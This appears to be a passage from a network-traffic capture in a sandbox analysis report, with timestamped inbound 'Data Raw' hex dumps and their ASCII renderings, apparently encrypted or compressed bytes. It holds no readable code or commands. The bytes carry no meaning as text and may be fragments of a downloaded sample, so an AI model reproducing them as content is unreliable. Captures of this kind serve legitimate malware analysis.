Data Ascii: '\z[`]RQ_{cA7o>$?}N)w3ki!'x[is1m9$fG]UL?z628'UT%^JX4:;pey<Nh\|c^>ul(V=#.Wac) -^(xjteWr/G*JIHO_Z9
2022-11-03 06:22:07 UTC	13	IN	Data Raw: 44 ab 83 aa 02 58 fc 1b 44 a1 42 7b 65 97 c0 c0 3d 3e 45 e0 cf 31 09 b4 95 98 fd 9e 0d bb 57 53 9c cb 6a 22 f4 f2 11 97 62 09 e4 5b 1c 01 16 c0 13 89 05 68 66 46 17 e5 b0 e2 24 80 72 10 91 2d 2c 0b 63 85 43 b9 c0 06 db f8 76 b2 a6 a0 73 42 9a bb a3 a3 b7 91 aa 66 e0 47 d7 31 bb fa 77 91 12 7b 1e 4e e1 b4 64 fc d4 da d4 85 54 cc 28 5d e4 df 06 70 9d e8 6d 5c 3b 82 ec 87 b0 35 84 f3 1f 53 1a 3b 48 ff cd ee 44 54 3e 16 a2 3f 6f cc 70 ba d7 02 08 27 d7 e5 2a 50 51 16 6d 66 2f cc f2 d7 6a a5 ef 2d 58 84 fa 71 6c a7 d3 ce 4a fa 0a e2 e3 40 7a d5 84 d3 41 73 b9 ea 71 4f 04 9d 62 67 de d8 5f c8 fe ee 3f e6 22 42 5c e3 c0 d2 6b 2d ea 44 d3 b6 35 0c bf c4 97 18 e2 d5 ba 18 07 af 6b 1b 70 9c 56 07 f6 de ec c3 97 fc 95 3e be 83 02 7c 60 3e 90 9d 1d 8e 9c 35 4c 47 24 Data Ascii: DXDB{e=>E1WSj"b[hfF$r-,cCvsBfG1w{NdT(]pm\;5S;HDT>?op'*PQmf/j-XqlJ@zAsqObg_?"B\k-D5kpV>\|`>5LG$
2022-11-03 06:22:07 UTC	17	IN	Data Raw: c0 8e 0e 90 89 54 82 38 5b 74 5d d4 30 dc b4 44 70 ba 1d ee f5 e6 6b 82 d3 17 cc d0 9f b3 d4 88 2c eb 42 61 62 b3 66 52 56 cf 02 fe 20 f5 6d 71 92 57 99 7a 49 25 72 25 21 07 10 92 c3 15 69 72 32 56 1d 1f 9f 96 0e fe c4 b0 5d 20 76 40 d9 2e 50 0c 26 fe 4d 2d be a9 8d dd Data Ascii: T8[t]0Dpk,BabfRV mqWzI%r%!ir2V] v@.P&M-
2022-11-03 06:22:07 UTC	17	IN	Data Raw: 70 51 04 9e f6 a2 4a 85 4c dd 2f d7 f6 f8 3c fe b8 28 ec ad 30 87 f5 34 54 37 9d 0a 0c fa 18 08 58 2d 96 de ab 26 2b de 5b cc 5b 52 bf ca a7 2d b0 ee 48 c6 71 65 88 7b df 26 f5 ae 6e 08 55 bf 1a b8 6b 1c 17 14 a5 68 83 ae a9 2a a2 e2 36 6b 59 6f 48 d7 a2 f2 c0 37 25 19 ca e9 36 28 58 9c 5f c5 c8 ca bb 57 51 bc 57 d3 22 f2 d0 66 b8 4f 28 33 53 3c f8 fd c1 e2 84 3e 8f 6e c6 2f f8 b0 ef 0b 97 cc 22 9b 2d 2d 13 d3 b8 43 9c c4 78 ec f8 76 b6 8e c2 6f 54 b0 21 b3 83 5b b1 62 71 46 0f c0 68 ae d5 8d 95 2a 9b 36 9b e1 a6 67 18 ec cf f2 af 70 f5 c9 72 de 22 9c 09 d5 fb 5d 5e 4a 6f ec 87 b1 77 9b f3 0e 24 61 3f 41 e8 d1 d4 50 e8 41 0c e5 3e 6e bb 2d 3c d6 03 73 3f ff ad 2f 42 52 70 f4 63 37 92 6e 8b 88 a4 ef 2a 4a da fb 71 6e b3 fe 8d 5a fe 15 d5 f9 35 70 d3 82 e0 Data Ascii: pQJL/<(04T7X-&+[[R-Hqe{&nUkh6kYoH7%6(X_WQW"fO(3S<>n/"--CxvoT![bqFh6gpr"]^Jow$a?APA>n-<s?/BRpc7n*JqnZ5p
2022-11-03 06:22:07 UTC	19	IN	Data Raw: bf 78 e1 54 ec a4 17 97 21 63 14 32 73 ee f9 6a 0f 23 2e fb 7f 44 cb 7b c2 60 13 34 00 53 dd 14 d9 a0 02 29 0c 70 45 22 99 e4 ce 67 e9 c8 6d 8b 5a 2a 89 ba 33 89 4c 05 87 b1 c4 ea d1 6b e1 1b c7 df f7 0a 1b ce b5 4b 09 5e ee b1 39 ac d5 aa 7f 10 0e 22 8c 8d 9f a5 fb 53 3b 7a 4d 69 e0 db f5 fa 1f fc 1c 24 0c 21 97 05 1d 9d b8 2c 45 f9 ff ce af 17 0a 3a 2b 29 a7 d2 c9 a9 ce c6 28 b0 e6 4f 48 d3 c0 78 68 f8 ae bc 65 70 7b 3e 9c 84 5f 7f 4d 5a e9 88 96 60 9e 80 57 bc 49 8a 65 0b 37 1d eb 80 5c 83 53 84 08 44 46 59 15 37 ce 24 42 2f 2e 11 d4 03 35 12 4c 15 28 90 a6 e8 5d 1d 38 e6 11 a0 94 d1 2f bd d8 ed a4 df 0f ce 0f d7 ac ec 5c d5 76 1a d0 ba b9 fb 63 0b 29 66 f8 45 1d 03 3d 4f a1 d6 36 45 59 57 81 86 39 27 b2 6c bf e7 61 d4 1b c9 d2 43 60 e7 f3 ec d0 db e6 Data Ascii: xT!c2sj#.D{`4S)pE"gmZ*3LkK^9"S;zMi$!,E:+)(OHxhep{>_MZ`WIe7\SDFY7$B/.5L(]8/\vc)fE=O6EYW9'laC`
2022-11-03 06:22:07 UTC	20	IN	Data Raw: 82 10 16 b5 6d da fc cc 90 37 08 fe 4a d4 21 ae c2 24 05 a5 2d 0d a9 8d d1 70 84 04 9e fa 54 2b af 4c c1 db d6 fe d2 3a d4 b9 38 ec b7 2a 87 de 72 77 7d 9c 14 4a cc 18 2b 1b 1d 99 98 e0 26 2a c5 55 c9 5b d5 c1 b7 a7 65 b4 ce 89 e0 89 20 a1 84 d9 3a de d7 e0 00 7d ea 00 95 6e 12 24 16 af 49 a3 41 8d d2 40 ca c9 61 87 4d 13 80 ee f2 ca 52 d7 34 d2 c5 5e 11 ad b8 85 cc cd 19 9d 29 29 94 e3 d7 25 d4 69 21 68 51 0a 12 50 37 d5 33 02 ca 85 24 a7 c6 c6 2f ef a8 cb 3c b1 ee 4c 35 2d 2c 1a cf bf 68 b0 c8 53 41 f3 5d 64 84 eb 9f 9c ac 45 eb a3 b7 91 9a 9a 6e f0 ca 4e ae ea e9 e7 2a 91 1f 43 e8 b0 69 a0 c8 e2 fe 84 56 d8 05 ec f5 db 96 d7 d9 c0 21 5d 4a c0 c4 e6 b1 48 91 2d 1f 7d 0b 32 40 fe c9 f9 1c ce 47 24 2b b6 6e b1 04 ba d7 02 66 09 d3 e5 62 42 54 1f 35 62 37 Data Ascii: m7J!$-pT+L:8rw}J+&U[e :}n$IA@aMR4^))%i!hQP73$/<L5-,hSA]dEnN*CiV!]JH-}2@G$+nfbBT5b7
2022-11-03 06:22:07 UTC	21	IN	Data Raw: 2f ba 73 96 72 34 32 3b 1b c1 8a bd d5 5d 22 85 0c 7d 4e 4c ed b7 0e 56 62 e8 0f e1 1e 20 a4 19 96 32 53 17 29 66 ea f9 14 4c 23 2e a7 7d 47 a9 0e f9 60 19 2d 42 15 fb 13 c5 d1 23 2b 2a 51 16 39 dd 12 dd 65 cb 90 7a e4 5e 30 a4 bb 12 a5 3c 3b 61 b1 c0 c7 cd 70 e6 11 64 2c dc 3d 59 b5 a0 5a 0b 72 2f 81 39 a6 fe 76 43 1f 32 72 a1 8e b3 93 d5 40 36 7c 1e a3 e0 db fb d5 30 e7 3a fe 0a 24 5b 23 14 b3 f1 9e 45 ff ec cb e2 31 03 5f 8c 2a ac f3 2b 93 c3 ef 4a ba eb 4c 4d 14 1f 76 7c f6 59 c5 12 70 7b 2f f4 ef 49 57 39 86 c3 82 92 9f 83 8a 89 8e 44 8c ae 0d 26 cf e4 ee 10 83 52 8c 1b 40 57 32 5a 75 e5 f4 5c 07 d1 0a e4 06 1d cb 4c 15 2e f6 c7 e8 4c 14 89 cc 19 8c 98 f8 72 e2 08 f3 86 fc 19 e4 0f 92 8c f1 5c df 5a 36 ba f7 ff a1 67 06 78 18 cf 44 1f 07 01 6d c6 ac Data Ascii: /sr42;]"}NLVb 2S)fL#.}G`-B#+Q9ez^0<;apd,=YZr/9vC2r@6\|0:$[#E1_+JLMv\|Yp{/IW9D&R@W2Zu\L.Lr\Z6gxDm
2022-11-03 06:22:07 UTC	22	IN	Data Raw: 45 ff 0a e7 4d fe 4b 79 eb f9 99 6b 40 21 50 0f 22 0d 27 4c d0 2f 56 71 6f 0a 38 15 b0 28 d3 e0 e1 98 16 20 76 4a db 27 70 cd 15 2e 53 05 6a aa 87 f0 bb ce 12 98 d8 84 2a 85 4a fc ff d1 ca c8 3a d4 bf 13 ea ab 18 51 d2 34 71 57 86 24 4e fa 8f 09 43 1d c7 de e0 37 28 f6 48 cd 5b 45 dc 9a b5 0b b6 a1 11 e3 a1 7d db 89 df 26 f7 9e eb 0e 73 9e 07 9e 43 d6 36 3c af 45 ae bb a9 6d d7 e3 36 67 fc 47 6d ff ea f5 e8 8f 3f 34 d4 11 6e 0e ae d7 06 da e0 33 c0 5b 57 94 e7 c1 23 8f 7d 07 b8 4b 4d d8 50 37 d5 c5 ae ef ad 62 8f 6e cc 34 c8 91 c0 0d 88 cf b4 85 05 d3 10 e3 b4 41 d6 4d 79 ec fe 0d ba 8e c0 76 6a c0 3b 95 a9 ba 93 9f 61 45 f3 cc 43 75 f5 6d bd 9e 91 1e 48 ca ae 67 0a c8 e2 67 85 56 d8 05 35 f5 db 96 d7 d5 c2 47 5c 5a ca ec 87 b1 69 9b c3 4e 57 4d 78 41 ee Data Ascii: EMKyk@!P"'L/Vqo8( vJ'p.Sj*J:Q4qW$NC7(H[E}&sC6<Em6gGm?4n3[W#}KMP7bn4AMyvj;aECumHggV5G\ZiNWMxA
2022-11-03 06:22:07 UTC	24	IN	Data Raw: 31 da 9b 2e d2 b7 b5 14 db 23 3c 9d d2 82 84 dd cd 6c ec 73 b0 c9 42 b7 94 2f ba 7d 4c 37 03 3b 3b 10 a3 b5 bd d5 59 6d ea 36 27 4e 62 d5 f7 0e 57 64 c4 23 e7 5c 92 a5 17 9c 30 7b 21 33 56 e4 d1 49 4d 23 24 6a 43 47 b8 74 e9 60 0a 19 2b 4b e1 13 cf cf 58 28 0c 6b 41 31 f3 ee c1 63 cb e3 7b e4 52 3e a4 b9 12 a1 41 41 c0 b0 c4 ec e0 51 ce ee 4f df e4 3a 59 ce ae 5a 0b 76 17 b1 39 b7 fb ac 6c 34 1e 30 a4 a6 95 8f f8 58 09 57 6c 90 e2 dd 90 73 11 fd 1a 04 1e 27 51 23 07 85 df 2d 72 ff ea e3 94 31 03 44 46 3e 8a c8 ed ff f8 c7 28 be e9 29 12 b2 c1 72 42 d0 8c d0 16 5b 95 4a a2 8c 49 53 31 35 9a 82 80 94 83 a7 87 a8 42 a2 aa 05 12 cb e6 1e 10 83 55 a5 18 4a 7c ad 1f 75 f0 c4 58 07 ed 10 d4 05 45 a6 4c 04 50 82 c7 e8 59 78 b8 ec 18 86 89 f5 43 e2 f3 b8 bd 07 32 Data Ascii: 1.#<lsB/}L7;;Ym6'NbWd#\0{!3VIM#$jCGt`+KX(kA1c{R>AAQO:YZv9l40XWls'Q#-r1DF>()rB[JIS15BUJ\|uXELPYxC2
2022-11-03 06:22:07 UTC	25	IN	Data Raw: 6c 53 b1 00 c9 e0 ed 66 8c 03 23 cc da b6 98 f5 a0 24 ca 9a 81 60 0e 4e a9 50 b1 4b e7 0d fa 72 12 ba f9 99 04 00 09 7d 0a 4d 85 3a 61 cd 24 45 5b 12 f6 76 15 b4 69 f8 dc e0 98 1b 35 5b 58 f2 35 71 e5 3f 2f 53 0f 69 ed 8c db 5e 89 30 98 db 89 20 ae a0 fd f7 cc cf cc 1c d2 c7 71 ec ad 34 af ee 35 77 77 96 06 4b d2 25 08 43 17 bd 9b e1 26 2d b2 52 d9 70 44 41 f9 a7 2d b0 e5 44 9c e2 7b a0 80 b0 85 f2 86 c0 23 50 9d 16 94 68 3c 16 04 9f 40 83 91 ab 02 5e be 36 61 96 6b 4d b1 ee f2 e8 e3 3f 34 d8 ef 30 08 ac 38 95 f6 ea 13 93 68 56 94 e5 ff 30 df fb 0d 93 bb 24 f2 10 57 c5 37 e8 ec ae 2d 85 45 c6 29 cd 74 e6 2d 91 ce 4c 26 2d 2c 16 c9 b2 43 b9 8e 6c 12 fe c9 b6 8e c6 01 59 9d 3b 93 cc a9 94 b2 69 44 f0 c3 58 a1 fd 47 95 2a 91 1e 4e e1 a6 49 53 c0 ca d2 ad 06 Data Ascii: lSf#$`NPKr}M:a$E[vi5[X5q?/Si^0 q45wwK%C&-RpDA-D{#Ph<@^6akM?408hV0$W7-E)t-L&-,ClY;iDXG*NIS
2022-11-03 06:22:07 UTC	26	IN	Data Raw: 0e 4b 24 b4 e2 fb 4b 1e 28 5b c2 72 76 af 2e 56 e0 55 e7 90 3f f3 02 ba 22 19 f9 9c 04 d2 10 50 1f f0 c4 14 d2 e2 8a 8e ef b3 2d ec 60 b4 e5 45 ca ae 2b 92 3e 4a 58 32 44 bd 1a dd 8e aa cd 47 77 08 70 26 4e 69 b2 9a 12 71 66 fe 2d 6d 3c aa a4 16 34 34 44 12 bc e1 62 b5 6a 4c 22 8c ec 55 ff b8 70 c5 4a 13 02 cf 58 cb 1b cf f7 0e 28 0c 1d 42 35 e7 ea cb 62 cb 89 7a e4 52 31 a4 97 12 dd c1 2e 61 b5 d3 f2 d1 43 68 69 4f df f6 1d 72 d6 93 5d 1d 74 cc f9 39 a6 f9 0a 6e 2d 1c 9c a6 a6 01 8e f8 58 3a 70 4e 61 eb f0 19 d1 20 f4 1c 3f 14 0c a4 23 14 b5 d9 5e b2 ff ea e5 9a 1c 01 73 78 a9 f2 d8 cb 85 ea 3f 28 ba eb 5d 50 b6 c1 bd 6f f4 a7 bb 1c 70 6a 1c a4 8d 49 5d e3 43 e9 82 82 b6 d9 8a 89 84 2b e1 af 00 16 fc c9 80 f5 83 53 88 36 4a 76 87 b8 80 ab f7 34 ec 94 3b Data Ascii: K$K([rv.VU?"P-`E+>JX2DGwp&Niqf-m<44DbjL"UpJX(B5bzR1.aChiOr]t9n-X:pNa ?#^sx?(]PopjI]C+S6Jv4;
2022-11-03 06:22:07 UTC	27	IN	Data Raw: 22 93 87 d4 48 e7 07 ee d8 1b ca a6 ed b0 59 76 7a d0 73 8b 5b fc c6 f4 1c 42 58 5f 00 c3 f8 a1 44 44 7d 17 ca f0 b2 b4 fc bb 2d c0 92 75 48 b4 4e a9 56 cf 0a ff 15 d3 53 5f b9 ec 87 57 56 2f 5d 44 fa d2 68 07 ad 6c 21 17 72 ed 5e 70 ed 0c fa c6 ca 7e 37 0b 9f 4a d7 17 7a cd 30 2e 53 05 41 a9 8d db 5a f9 13 b3 d7 ac 0b 08 b0 64 bf b1 87 b4 5f b2 df 5d 89 cb 69 84 c5 28 5a 68 bb 34 a5 2d ed c8 25 7b f0 bb 86 40 4e b8 00 94 3a 69 e7 9c 70 0b 9f 27 98 e2 a2 4b aa 84 f0 26 f3 86 c6 08 55 b5 03 88 71 17 1d 31 ac 56 94 85 b5 24 7e e0 10 01 25 2d 08 99 88 97 a6 58 59 51 8b cd 2b 12 81 b4 a9 d8 b9 54 da 7d 71 bf 3e f5 09 14 de 2c 4a 4f 21 dd 5a 37 dc 1b eb ca 85 2e 8f 6e c4 3a fd 9d e1 0b bf a9 64 9b 27 06 36 c8 45 43 5b ec 93 ec f8 70 66 90 c0 72 40 b4 7d 95 a3 Data Ascii: "HYvzs[BX_DD}-uHNVS_WV/]Dhl!r^p~7Jz0.SAZd_]i(Zh4-%{@N:ip'K&Uq1V$~%-XYQ+T}q>,JO!Z7.n:d'6EC[pfr@}
2022-11-03 06:22:07 UTC	29	IN	Data Raw: 95 3e be c7 40 7c 60 34 bf 93 69 a2 ba 35 48 55 21 d9 d4 0f 33 f1 43 da a2 a5 42 7c b4 e3 e6 65 1d 15 71 c4 56 fe fb 34 7b ec d1 c8 34 39 51 03 b8 b2 32 1f bc 05 36 1d ac e5 db 22 17 f1 d8 82 81 d7 b3 2d ec 73 b4 e5 57 d2 b3 02 bd 5f 62 ed 34 3a 3d 30 fb a1 4a d5 4e 5f 81 02 18 4f 68 ab db 0e 57 71 c8 92 e1 74 aa d7 1e 97 32 55 0c 1f 11 c8 ee 73 61 6a 08 ec 6b 34 eb 71 c3 6a 0e 04 6c 6d fd 04 96 d9 22 15 2a 7d 44 5a b9 e8 cf 6d ef ef 98 48 7b 05 ef d6 51 c5 22 48 04 d4 a2 8c af 7b f9 b9 0a 32 91 6f 39 ab d3 3c 6e 10 25 d7 5c c7 f5 a0 45 20 31 2e 21 d7 b9 8e fc 75 a3 70 4e 03 eb f0 42 d8 3b 3c 14 41 44 0d a4 29 3f b4 cd 3e 41 f7 c6 f2 8a 11 fe aa 17 c4 c1 bd ad e7 a4 a2 4e df 8d 27 6d a3 c5 54 67 e5 a3 bc 4d 71 7b 3e b0 8d 5d 44 36 4b ec 52 0f 9e 9f 8b a1 Data Ascii: >@\|`4i5HU!3CB\|eqV4{49Q26"-sW_b4:=0JN_OhWqt2Usajk4qjlm"*}DZmH{Q"H{2o9<n%\E 1.!upNB;<AD)?>AN'mTgMq{>]D6KR
2022-11-03 06:22:07 UTC	30	IN	Data Raw: 8c ff b7 e8 1b bf d1 dd 7f 2f 46 d1 b7 87 ca ee 42 68 75 a2 fe 76 1f c4 f6 42 26 fb b1 2e 80 70 85 ca 3b 7a 25 0a b0 d9 2d 52 26 77 a0 5b aa 69 f4 1c 40 7b ce 5d c3 fe c4 4c 10 d6 17 cc e9 98 ad 72 a8 27 c0 b0 66 46 a5 40 bf 49 97 95 f6 03 e9 54 49 27 e8 97 62 5c 51 e0 1f 2c 78 6e 60 cb 03 4e 77 07 a8 e5 cc b6 6d d0 e2 c1 61 45 ac 59 2b d3 46 63 c2 13 21 73 30 26 56 ac ba 4b ea 7a c4 f0 8a 2f ea 4d d6 f1 d1 f3 dd 50 bb ef 39 ec a7 4e dc d2 34 73 51 91 6a 11 fa 18 0d 50 0d ad a9 e0 26 2b a0 39 cc 5b 47 d4 84 bf 53 ee ce 98 e6 ce 79 a1 84 d9 06 4f 46 39 f7 34 a4 0e f4 00 29 2d 3c a8 3d df a8 ab 06 4d f3 27 70 aa 4e 79 ec fe d9 87 43 65 34 d2 cb 20 19 c3 bf 8e db e6 26 ab 41 44 86 c8 ff 33 e4 e9 15 37 6d 22 ed 51 12 a2 39 eb ca 84 50 d0 6e c6 2b f4 a2 ff 72 Data Ascii: /FBhuvB&.p;z%-R&w[i@{]Lr'fF@ITI'b\Q,xn`NwmaEY+Fc!s0&VKz/MP9N4sQjP&+9[GSyOF94)-<=M'pNyCe4 &AD37m"Q9Pn+r
2022-11-03 06:22:07 UTC	31	IN	Data Raw: 91 30 77 a0 ab 97 1c 9c b7 c1 7a 0d 82 6d 2a 39 ef 5c 05 e2 cc d2 cc ca c5 93 12 a8 c7 b2 76 4b c5 c1 c1 63 a2 98 1e b9 53 4e a0 d4 0f 3b ea 49 ea 97 80 1f 02 9e 9e 81 66 06 0a 77 2c 70 fa e7 3d 66 e7 f7 85 87 39 51 75 92 94 08 fa 8c 01 de 48 da 15 db 28 6e c2 5f a0 8e d7 b2 38 c1 7b 92 f3 48 e4 ad 09 91 7f 40 73 c2 31 10 1a df f1 df d5 5d 6b 83 05 25 21 34 aa b7 04 42 4d ee 09 e9 58 be 8f 14 9a 19 ab 10 3a 0e e5 fa 62 15 dd 25 eb 7d 44 ae 40 14 67 1f a7 44 65 e8 14 42 ed 0e 28 0d 77 44 23 ff ff c8 4f bd ce 7a ee 5d 21 8f 9a 34 a3 47 2d 51 b8 c4 f1 ca 5b e5 1b 4f df f7 08 77 8f b5 5a 01 74 5f a1 b4 81 f8 a8 6b 20 37 3d 87 a8 93 f3 9d 5e 10 7e 4e 4e e0 c8 cf d1 10 bb 1c 2e 14 00 a4 23 05 b7 f1 6c 45 ff e0 fc 93 2d 2e 5f 74 2a b0 ba d0 ac c7 e1 03 af e1 6d Data Ascii: 0wzm9\vKcSN;Ifw,p=f9QuH(n_8{H@s1]k%!4BMX:b%}D@gDeB(wD#Oz]!4G-Q[OwZt_k 7=^~NN.#lE-._tm
2022-11-03 06:22:07 UTC	32	IN	Data Raw: 08 58 f7 19 e0 92 2a 50 09 08 17 90 fd 15 a6 80 03 a7 36 4b aa bd b4 44 ad 73 06 cb 76 3a 3b cd b2 12 4f c6 8a b1 93 30 96 8c 68 75 a0 92 4e 78 a1 96 4b 3a 9c d4 4e e3 07 37 d8 1b c6 a6 3c b1 59 76 3d b1 72 8b 5b fe 35 c4 15 44 61 b0 00 c3 fe c0 6c aa 55 34 cd da b8 a8 d2 89 01 ea 31 3c 48 b4 4a 82 ae cf 08 e7 16 ce 48 79 32 f9 99 7a 34 09 7d 1f 20 1d a1 15 60 09 44 70 03 a5 2f 33 b6 7a 4a 99 c1 98 11 21 07 6a d4 27 71 d8 2f 27 75 03 6d e2 a6 dd 53 ce e3 94 db 7f 2c ad d7 d7 f1 d1 fa ff 31 f2 b1 10 99 ad 30 8d ff 3f 5c 7e 91 3f b9 f2 30 1f 42 1d 93 00 c4 03 03 92 65 cc 51 4e c6 9f 3b 2d b4 c8 91 c2 55 50 70 9a f7 d9 f3 86 c0 20 e1 b5 01 93 40 5b 3c 17 a5 9d 83 d6 86 02 5e e6 59 37 87 4b 67 e9 c0 fd be 10 3f 34 d6 a0 66 08 ac b2 a7 ce e1 35 bd 7d 56 84 e3 Data Ascii: X*P6KDsv:;O0huNxK:N7<Yv=r[5DalU41<HJHy2z4} `Dp/3zJ!j'q/'umS,10?\~?0BeQN;-UPp @[<^Y7Kg?4f5}V
2022-11-03 06:22:07 UTC	33	IN	Data Raw: 58 44 27 89 71 34 99 d9 5f c6 cc a3 2f c0 3e 39 f3 54 d7 8f 09 2a e0 62 da 8f 24 7d 8b 21 9c 37 60 a6 be 33 fe 85 6f 39 85 83 71 0e e1 82 f3 cf fd e7 a4 cf bd c6 b8 7c 63 04 b5 a3 76 a2 9c 35 48 55 21 d9 d6 27 70 e8 5d fd b8 80 25 09 b7 c5 c4 4c 7b 60 5c d4 74 d1 1f 2e 56 e1 ec d0 84 39 1a 05 92 94 38 f9 9a 3f da 40 e9 14 Data Ascii: XD'q4_/>9T*b$}!7`3o9q\|cv5HU!'p]%L{`\t.V98?@
2022-11-03 06:22:07 UTC	33	IN	Data Raw: db 26 01 ec db a4 89 ff 3a 2d ec 79 9f e6 5f e2 5e 2d c1 17 4a 58 30 39 54 96 dd 8a b7 f9 48 6d fe 6c 26 4e 6c a8 d8 83 57 60 e2 36 cc 77 8c 7a 03 9c 19 a8 13 29 7b ed df b4 46 29 05 11 7a 6f 32 70 c3 6a c5 2f 07 4b fa 03 cf cf 0c 28 19 7a 6f 77 f6 ee cf 67 e3 cf 61 d4 50 2b e7 b0 34 a3 65 2e 61 a0 c6 91 a4 5b e5 1f 5a f2 fe 2c 59 e6 3c 5a 0b 7c 6b b2 33 8d 0d aa 12 54 1a 3e a5 8d d6 02 f8 5e 1a 56 4a b4 9b b5 ff d2 14 fe 73 a3 14 0c ae 27 3c e7 d9 2d 4f 90 b9 e3 83 3b 2f 57 8c 06 a5 a3 a5 81 c1 c3 2b be c3 14 60 b2 cb 17 e0 f4 a7 d9 c2 6b 79 4f f5 8c 49 53 30 5e c1 d0 80 9e 95 e5 06 8e 44 ab 70 07 1a e7 44 a8 10 89 8f a4 74 24 56 4d 35 75 e9 f4 49 07 80 77 d4 02 1d a6 4c 15 35 88 c4 e8 6e 17 e6 ec 3b 8c 92 c9 42 bf b6 ed ae 07 0f c8 00 db aa d8 d5 d5 76 Data Ascii: &:-y_^-JX09THml&NlW`6wz){F)zo2pj/K(zowgaP+4e.a[Z,Y<Z\|k3T>^VJs'<-O;/W+`kyOIS0^DpDt$VM5uIwL5n;Bv
2022-11-03 06:22:07 UTC	35	IN	Data Raw: c7 7c 17 c6 f0 32 c4 ff 8b 23 f8 7f 88 b7 4b ce db 56 cf 0c df dd 03 b4 86 3a 88 99 7a 47 31 aa f3 dd f4 bb 15 cb 09 40 49 cd 75 c7 ea b4 6d d0 f3 d1 9b 11 65 76 4a d4 5c 70 cd 13 5d 3d 04 41 a3 9b f7 74 c3 02 81 b0 e5 44 84 4c dd f7 d5 8d a2 3b d4 b3 3e ee c2 e7 87 d2 3e 71 12 ec 15 4a f0 00 24 4c 3b 93 b1 39 26 2b d4 79 e1 57 65 eb bd 8c ff 34 b9 98 e2 a5 50 4b 04 a7 26 f3 82 ed e6 55 b5 01 86 58 3d 3c 0c af 43 83 fe ab 02 4f f5 20 77 80 5e 75 d2 e3 d4 c2 27 26 19 d8 e9 19 24 ad b8 89 f1 c6 1e 4a 71 7c 60 e3 c0 12 f6 f8 12 b8 4f 22 91 50 37 c2 19 c3 e7 84 2e 89 76 eb 26 c3 a2 e7 56 12 e8 64 9f 07 27 3b 16 b2 43 b9 df 48 ea f8 27 b3 8e c0 0f 42 9c 2a eb d7 b7 95 b6 75 43 fa e6 79 a2 d5 ed 95 2a 9b 35 4a f2 ac 4a f1 bf b9 d4 85 52 dc 42 26 f4 db 96 77 a6 Data Ascii: \|2#KV:zG1@IumevJ\p]=AtDL;>>qJ$L;9&+yWe4PK&UX=<CO w^u'&$Jq\|`O"P7.v&Vd';CH'BuCy5JJRB&w
2022-11-03 06:22:07 UTC	36	IN	Data Raw: 26 da d5 70 f0 88 57 57 e1 fd cb f7 37 55 14 97 0e 60 c7 9a 2e d9 4a b9 14 db 23 07 c9 ac f1 8e d7 b7 3f e4 5b 33 e4 54 c3 c4 56 bb 79 40 26 47 3a 3b 1e cf 82 95 5d 5c 6f 8f 6d 5f 4f 68 a1 c9 7d 57 60 ec 3d e9 5c 23 a5 17 9c 5d 2a 16 32 5c 90 8a 6a 4c 27 3c e2 55 cd b9 70 c9 0f 60 28 2d 41 d0 0a b1 bc 0e 28 08 74 46 24 f3 73 bb a4 e3 cf 7b 8b fd 2b 89 ba 5b d8 46 2e 6b a0 c1 fd 92 48 e0 0a 4a ce fb 34 a5 35 4a a5 75 02 40 b1 3d c9 73 a9 69 30 16 40 d5 8e b9 8a ee 34 7f f6 64 b6 ea d9 d3 b2 18 73 ab 0e 48 0f a4 23 26 e3 a7 5e 45 ff ee e1 ec 43 02 55 58 57 d4 d8 cb 85 c9 49 9f ad b2 29 19 b3 c1 72 10 80 a7 d3 18 67 6c 47 16 8d 49 5d 20 53 f8 8b 88 89 97 04 3e 99 1d ce 20 01 1c c5 df a1 7f fa 53 8e 11 3e 23 5d 35 71 84 7f 5d 07 db 1d aa 71 1d a6 48 03 44 d7 Data Ascii: &pWW7U`.J#?[3TVy@&G:;]\om_Oh}W`=\#]*2\jL'<Up`(-A(tF$s{+[F.kHJ45Ju@=si0@4dsH#&^ECUXWI)rglGI] S> S>#]5q]qHD
2022-11-03 06:22:07 UTC	37	IN	Data Raw: 54 a7 c0 8e 0b df 02 70 52 2c 4b a8 5c d4 36 8a 69 44 70 b4 7e b2 fe c0 68 c5 e5 16 cc d0 9a 4c ff 8b 2d 4c 83 75 48 b5 21 f2 56 cf 02 df 0d ff 4b 79 c4 88 99 7a 47 66 b4 0e 22 01 2c 38 dc 51 c9 da 14 88 39 06 b2 7b c1 e6 6f 2f 06 79 65 41 c7 20 5b d8 13 28 42 02 3f d8 8d db 5c 8a 90 9f f0 80 89 94 4b c0 a9 c4 e5 c3 3d c5 b2 09 09 d3 45 87 d2 30 66 7b f2 4f 4a fa 12 31 f1 1d 95 de 9e 53 2b de 61 de 52 3d b0 b7 a7 29 ab de f7 28 a1 7b aa ac 4d 27 f3 8c d7 01 d9 fd 01 95 69 55 67 17 af 49 bb 21 ab 02 5e 9c 43 61 87 4f 7f f3 90 83 c0 3d 3b 5b 1b cf 31 02 d2 c9 8f db e4 5a 72 57 57 9e cb 4c 23 f4 f2 16 b4 c3 1d ed 50 36 bc 40 eb ca 8f 05 d4 10 b3 2f e5 b4 f4 20 e9 99 64 9b 29 43 d9 e3 b2 49 c7 b5 78 ec fc 19 7f 8e c0 78 3c ed 3b 95 a7 d8 5c b2 6f 64 8e b1 68 Data Ascii: TpR,K\6iDp~hL-LuH!VKyzGf",8Q9{o/yeA [(B?\K=E0f{OJ1S+aR=)({M'iUgI!^CaO=;[1ZrWWL#P6@/ d)CIxx<;\odh
2022-11-03 06:22:07 UTC	38	IN	Data Raw: af 93 61 a2 b8 35 48 55 a3 d9 d4 1e 11 fd 71 27 a4 ab c6 24 b4 e5 9c 95 06 0e 56 58 38 fa e7 2f 7e b2 f6 e0 81 40 19 05 92 95 68 b1 9a 2e d9 11 94 24 d9 22 0b c1 d2 82 80 d7 b3 3c cc 72 98 35 4a e1 54 2f ba 7f 6a 6a 18 ea 25 32 22 8a bd d3 75 3c 84 02 20 3a c3 ab b7 0f 7d 60 fb 1f e3 74 b5 a4 17 96 3c 53 17 23 76 ce d5 ba 52 0b d1 ea 7d 41 98 ac ee b0 07 01 d2 4b fb 15 e7 9c 0f 28 0a 0e e9 35 f6 e8 e5 67 f0 ff 78 e4 4e 2b 89 b0 3a a3 47 3f 41 7d e9 3a d4 73 1a 1b 4f d9 89 75 5f ce bf 72 58 77 40 b7 4d 0d f8 a8 68 10 1a 3e b2 be bb 8e dc 5e 10 7a e6 b6 e0 ca df 3b 3d 2d 02 06 eb 0c a4 25 34 fc fa 2d 45 73 56 e3 83 30 2b 06 53 29 a1 a1 77 81 c1 c6 59 06 eb 46 61 98 d2 48 6c f4 87 d3 1c 70 70 34 9b 9d 69 cb 1e 8a f7 aa 7f 9e 9f 8c 9f 02 64 a1 ae 01 34 9c cf Data Ascii: 